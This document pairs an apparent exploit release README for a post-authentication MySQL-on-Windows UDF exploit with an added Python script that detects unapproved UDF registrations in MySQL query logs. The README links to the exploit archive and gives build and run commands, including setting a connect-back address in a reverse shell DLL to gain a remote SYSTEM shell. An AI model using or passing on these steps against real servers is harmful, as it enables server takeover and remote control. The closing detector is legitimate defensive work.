Created
November 7, 2016 08:10
***
FARLiGHT ELiTE HACKERS LEGACY R3L3ASE
***

Attached is the MySQL Windows Remote Exploit (post-auth, udf
technique) including the previously released mass scanner.
The exploit is mirrored at the farlight website http://www.farlight.org.

Oracle MySQL on Windows Remote SYSTEM Level Exploit zeroday
All owned By Kingcope

https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23073.tar.gz

Installation Instructions
=============================

1. Install mysql client libraries and headers (UNIX)
RedHat based (e.g. CentOS):
yum install mysql mysql-devel

2. Compile the standalone exploit
issue commands:
gcc mysqljackpot.c -o mysqljackpot -L/usr/lib/mysql -lmysqlclient

3. Compile the reverse shell payload (this is required!)
required because the connect back ip and port are hardcoded in the dll:
use mingw on windows or wine
change REVERSEIP and REVERSEPORT to suit your needs. If you change REVERSEPORT you have
to change the port in mysqljackpot.c too (default port: 443).
issue commands:
set PATH=%PATH%;c:\MinGW\bin\
gcc -c payload.c
gcc -shared -o payload.dll payload.o -lws2_32
copy the payload.dll into the mysqljackpot exploit folder

4. Run The Exploit
./mysqljackpot -u root -p "" -t 99.99.99.99
A valid database admin user and his password are required
for the exploit to work properly.
This exploit is especially useful when used in connection
to a MySQL login scanner, see scanner/README.mysql inside this package.
Be sure to have the firewall open on the desired reverse port
on the attacking machine.

5. Enjoy your SYSTEM Shell!!!

Yours Sincerely,
-- Kingcope
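
Seen from the defending side, a post-auth UDF technique such as the one named above has to register a function from a shared library on the server, which MySQL does with CREATE FUNCTION ... SONAME. The following is an added example, not part of the original release: it scans a MySQL general query log for such registrations and attributes each one to the account and host that opened the connection. It assumes the general query log (general_log) is enabled; the log lines, function and library names, and the allowlist are constructed for illustration.

```python
import re

# Constructed sample in general query log layout: timestamp, connection id, command, argument.
SAMPLE_LOG = """\
2016-11-07T08:10:01.100000Z\t   41 Connect\tapp@10.0.0.12 on shop using TCP/IP
2016-11-07T08:10:01.200000Z\t   41 Query\tSELECT id FROM orders WHERE id = 7
2016-11-07T08:10:05.300000Z\t   42 Connect\troot@203.0.113.50 on  using TCP/IP
2016-11-07T08:10:05.900000Z\t   42 Query\tCREATE FUNCTION constructed_fn RETURNS INTEGER SONAME 'constructed_lib.dll'
2016-11-07T08:10:06.000000Z\t   43 Connect\tdba@10.0.0.5 on  using TCP/IP
2016-11-07T08:10:06.500000Z\t   43 Query\tcreate aggregate function approved_sum returns real soname 'approved_udf.dll'
"""

# One log record: timestamp, connection id, command word, rest of line.
LINE = re.compile(r"^(\S+)\s+(\d+)\s+(\w+)\s*(.*)$")
# MySQL's documented statement for loading a UDF from a shared library.
UDF = re.compile(
    r"CREATE\s+(?:AGGREGATE\s+)?FUNCTION\s+(?:IF\s+NOT\s+EXISTS\s+)?`?(\w+)`?"
    r"\s+RETURNS\s+\w+\s+SONAME\s+['\"]([^'\"]+)['\"]",
    re.IGNORECASE,
)

def find_udf_registrations(log_text, approved_libs=frozenset()):
    """Return UDF registrations whose library is not on the allowlist."""
    approved = {lib.lower() for lib in approved_libs}
    sessions = {}   # connection id -> "user@host" taken from the Connect record
    findings = []
    for raw in log_text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue  # continuation lines of multi-line statements are not handled here
        ts, conn, command, arg = m.groups()
        if command == "Connect" and arg:
            sessions[conn] = arg.split()[0]
        elif command == "Query":
            u = UDF.search(arg)
            if u and u.group(2).lower() not in approved:
                findings.append({
                    "time": ts,
                    "account": sessions.get(conn, "unknown"),
                    "function": u.group(1),
                    "library": u.group(2),
                })
    return findings

if __name__ == "__main__":
    for f in find_udf_registrations(SAMPLE_LOG, {"approved_udf.dll"}):
        print("unapproved UDF registration:", f)
```

Any hit from an account or source address that does not normally administer the server is worth correlating with the authentication log, since the technique depends on a valid admin login.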